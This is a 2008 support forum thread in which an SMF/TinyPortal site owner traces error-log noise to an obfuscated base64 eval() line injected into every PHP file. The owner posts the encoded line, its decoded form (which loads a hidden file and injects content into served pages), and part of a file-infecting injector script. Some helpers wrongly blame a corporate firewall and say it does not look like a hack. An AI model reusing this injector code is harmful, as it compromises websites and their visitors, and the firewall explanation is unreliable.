8: Undefined index: dhhag

FUBAR · September 20, 2008, 03:54:53 AM

Link to my site:
SMF version: SMF ver. 1.1.6 (Upgraded tonight from 1.1.5)
TP version: TP v1.0.5 beta 1
Theme name and version: Default + All Others
Mods installed:
1.    SMF Poll Mod     1.2
2.    SMF 1.0.14 / 1.1.6 Update    1.0
4.    Users Online Today Mod    1.4.0
5.    Auto Embed Video/Audio Clips    3.1.2
6.    PM Popup - Uses Active Window    1.3
7.    TinyPortal    1.052
8.    SMF Gallery Lite    1.8.3
9.    Ultimate Profile    0.8.5
10.    Custom Profile Field Mod

Related Error messages:

8: Undefined index: dhhag
File: /home/website/public_html/forum/Themes/default/languages/Post.english.php (eval?)
Line: 1

8: Use of undefined constant path - assumed 'path'
File: /home/website/public_html/forum/Themes/default/languages/TPShout.english.php (eval?)
Line: 1

8: Undefined index: dhhag
/home/website/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php(1) : eval()'d code(1) : eval()'d code
Line: 1

8: Use of undefined constant path - assumed 'path'
File: /home/website/public_html/forum/Themes/cargo115/Display.template.php (eval?)
Line: 1

8: Use of undefined constant port - assumed 'port'
File: /home/website/public_html/forum/Themes/cargo115/Display.template.php (eval?)
Line: 1

2: gzinflate() [<a href='function.gzinflate'>function.gzinflate</a>]: buffer error
File: /home/website/public_html/forum/Themes/default/languages/Arcade.english.php (eval?)
Line: 1

I noticed recently that my error log is getting filled very quickly with these types of error's. I haven't done anything new with my site for a while and it was error free last time I checked because everything was installed fresh. I tried to run a search here and on SMF's site for similar errors but couldn't find anything related. I actually have more variations of these errors but didn't want to fill the thread with all of them.

Also note, I think all the error's have "Line: 1" at the end of them.

Please let me know if I can provide any more information and any help would be greatly appreciated.

IchBin · September 20, 2008, 06:24:49 AM

None of the errors look like they are TP related other than the path one. Even that one I doubt is related. The best thing you can do is start trouble shooting to see where they happen. If the error happens on every page you should look in the index.template.php. If it only happens on a single page, then you should look in the corresponding file for that page to see if you can find the same text.

FUBAR · September 22, 2008, 08:34:44 AM

I think I figured out what is creating these errors but have no idea how this happened. I checked the .php files on my forum and entire site and found code added to EVERY .php file on my site. It's the same code on every file and it's at the very top of the page. The code is base64 and has to be decoded to be read properly and looks like this....

Code Select

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdlmKGZpbGVfZXhpc3RzKCcvaG9tZS92b3dvZmF
wYS9wdWJsaWNfaHRtbC9mb3J1bS9GQ0tlZGl0b3IvZWRpdG9yL2ZpbGVtYW5hZ2VyL2Jyb3dzZXIvZGVmYXVsdC9pbWFnZXMvaWNvbnMvMzIvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3Zvd29m
YXBhL3B1YmxpY19odG1sL2ZvcnVtL0ZDS2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ
1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZig
kZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDAp
LCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50L
UVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO
31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

When decoded it looks like this...

Code Select

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/mywebsite/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php')){include_once('/home/mywebsite/public_html/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32/copper.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}

I'm not sure how this got added to every .php file on my site and have no idea how I could possibly fix this.

Idea's on how this happened or any help would be greatly appreciated.

Zetan · September 22, 2008, 08:44:40 AM

Are you editing files behind a corporate firewall/proxy?

Those kind of errors can occur depending on the level of security. My company firewall will rip the code to shreads on a save. Example in part, Google Ad block (Scroll to the right):

Code Select


<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/+sfgRmluamFuX1R5cGU9amF2YV9zY3JpcHQmRmluamFuX0xhbmc9dGV4dC9qYXZhc2NyaXB0+/show_ads.js">
</script>

It's inserted a load of gobbledygook.. That may not be your problem, but it can happen depending on firewall settings. It doesn't look like a hacking attempt, those look more structured.

G6Cad · September 22, 2008, 08:52:05 AM

The debug code is used to verify that scripts used are valid.

The line 1 error makes me think you have a code added to any block or article ( probably article as the FCKEditor is involved some how )

What content have you added to your articles and blocks ? And where are you on the site when these errors show up ?

FUBAR · September 22, 2008, 08:58:49 AM

@ ZTN - I may have done some editing at work and they would definitely have some type of security or firewall as I work for a bank. I haven't edited any files directly but I have edited some of the blocks or modified theme files. I don't see this extra code on my blocks but it is on every .php file on my site at the top of the page.

@G6 - These errors seem to happen on every page I'm on and I think it's because this code is on every file on my site. The code that's added is in my previous post and it is added to every file but not the blocks or articles.

Zetan · September 22, 2008, 09:09:29 AM

Quote from: FUBAR on September 22, 2008, 08:58:49 AM
@ ZTN - I may have done some editing at work and they would definitely have some type of security or firewall as I work for a bank. I haven't edited any files directly but I have edited some of the blocks or modified theme files. I don't see this extra code on my blocks but it is on every .php file on my site at the top of the page.

I would experiment, then you can establish whether the firewall is the cause.. If it is, there is nothing you can do about it, other than have fresh files and avoid editing while at work.

BTW.. Yr SACKED!

FUBAR · September 22, 2008, 09:23:33 AM

Well I hope not. lol

I think I'm getting a little closer and found something else that seems a little odd.

I think I found some extra files in this directory...

/forum/FCKeditor/editor/filemanager/browser/default/images/icons/32

Here's an image of the files...

The files have huge amounts of base64 code in them and some of it decodes similar to the errors I'm getting.

Code Select

function FF97A1D7A5B771B21D423C3A9D78408C1($RC4A5B5E310ED4C323E04D72AFAE39F53, $R399036803A841185E4A270BC666A66CF = false){ global $_GET; if(isset($_GET['dgd'])){ $R399036803A841185E4A270BC666A66CF = false; } if(file_exists($GLOBALS['dgcp'] . 'u')){ if(!$R399036803A841185E4A270BC666A66CF){ echo"stop flag ['u'] found<br>[465476673]"; } return; } if(!FB078122F16A8F8B2978109BD72E1AC30($GLOBALS['dgcp'].$GLOBALS['dgin'])){return;} touch($GLOBALS['dgcp'] . 'u'); $RDAD8D40EB9906CAB35CCB38DE41CB7EF = FFD456406745D816A45CAE554C788E754($RC4A5B5E310ED4C323E04D72AFAE39F53, 180, $RF89F518E40FF53B4FD2A7D2440090D63); FE19A7FAB0F9597E68E23311BB5FB460F($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"downloaded php size: ".strlen($RDAD8D40EB9906CAB35CCB38DE41CB7EF)."<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path</b><br>[44883279]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path set to {$GLOBALS['dgcp']}</b><br>[5482745]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set name</b><br>[58819152]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">name set to {$GLOBALS['dgin']}</b><br>[2246876]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgep\'] = "', '";', $GLOBALS['dgep'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to exploit</b><br>[5093713]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to exploit successfully set to {$GLOBALS['dgep']}</b><br>[8799102]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set relative root dir</b><br>[58819152]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">relative root dir successfully set {$GLOBALS['dgsp']}</b><br>[5893301]<br>"; } if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '$GLOBALS[\'dgfxp\'] = "', '";', $GLOBALS['dgfxp'])){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set path to fix file</b><br>[9477124]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } if(!$R399036803A841185E4A270BC666A66CF){ echo"<b style=\"color:green\">path to the file for fix successfully set {$GLOBALS['dgfxp']}</b><br>[5018843]<br>"; } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); $RE477255A8507A54E5CA56CA24210B7DB = strval(strlen($RCFFAE742FB4E724571041779A10EFDA9)); while(strlen($RE477255A8507A54E5CA56CA24210B7DB) < 7){$RE477255A8507A54E5CA56CA24210B7DB = '0' . $RE477255A8507A54E5CA56CA24210B7DB;} if(!F7C23AA131822F77A31BC8492D9A7CE00($RDAD8D40EB9906CAB35CCB38DE41CB7EF, '"00'.'0', '";', $RE477255A8507A54E5CA56CA24210B7DB)){ if(!$R399036803A841185E4A270BC666A66CF){ echo "<b style=\"color:red\">failed to set size</b><br>[86612935]"; } F52293B786F39B90808D05A2530BA5100(1); die(); } $RCFFAE742FB4E724571041779A10EFDA9 = FCE5FE761FE36220458FAE651AEABF6D9($RDAD8D40EB9906CAB35CCB38DE41CB7EF); if(!$R399036803A841185E4A270BC666A66CF){ echo"my packed size: $RE477255A8507A54E5CA56CA24210B7DB<br>"; } F17B8C65064AE90679E4CE6254EF6C510($GLOBALS['dgcp'].$GLOBALS['dgin'], $RCFFAE742FB4E724571041779A10EFDA9, "<b style=\"color:green\">{$GLOBALS['dgcp']}{$GLOBALS['dgin']}</b><br>", 1, $R399036803A841185E4A270BC666A66CF); if(!$R399036803A841185E4A270BC666A66CF){ echo "<h3>INJECTING PHP FILES</h3>"; } F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgdr'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); if($GLOBALS['dgsp']){ F012D69AC5CE9ED6C2EC5DF1609CA51C4($GLOBALS['dgsp'], $GLOBALS['dgij'], 1, $R399036803A841185E4A270BC666A66CF); } F52293B786F39B90808D05A2530BA5100(1); if(!$R399036803A841185E4A270BC666A66CF){ echo "<hr><b>dgok</b>"; }}

I only decoded part of it because it's massive...

Do you think this is some type of hack?

Zetan · September 22, 2008, 09:33:03 AM

Well, I don't know.. other that what I already suggested. The files look as if they have been processed, firewalls do this to make dangerous scripts useless. They will often flag harmless scripts too. Like an over zealous antivirus program.

FUBAR · September 22, 2008, 09:40:09 AM

I just found this as well running a Google search on FCKeditor exploit.

http://securityreason.com/exploitalert/4572

Do you think this could be related?

Recent

User

Stats

Members

Stats

Users Online

8: Undefined index: dhhag

FUBAR

IchBin

FUBAR

Zetan

G6Cad

FUBAR

Zetan

FUBAR

Zetan

FUBAR

This website is proudly hosted on Crocweb Cloud Website Hosting.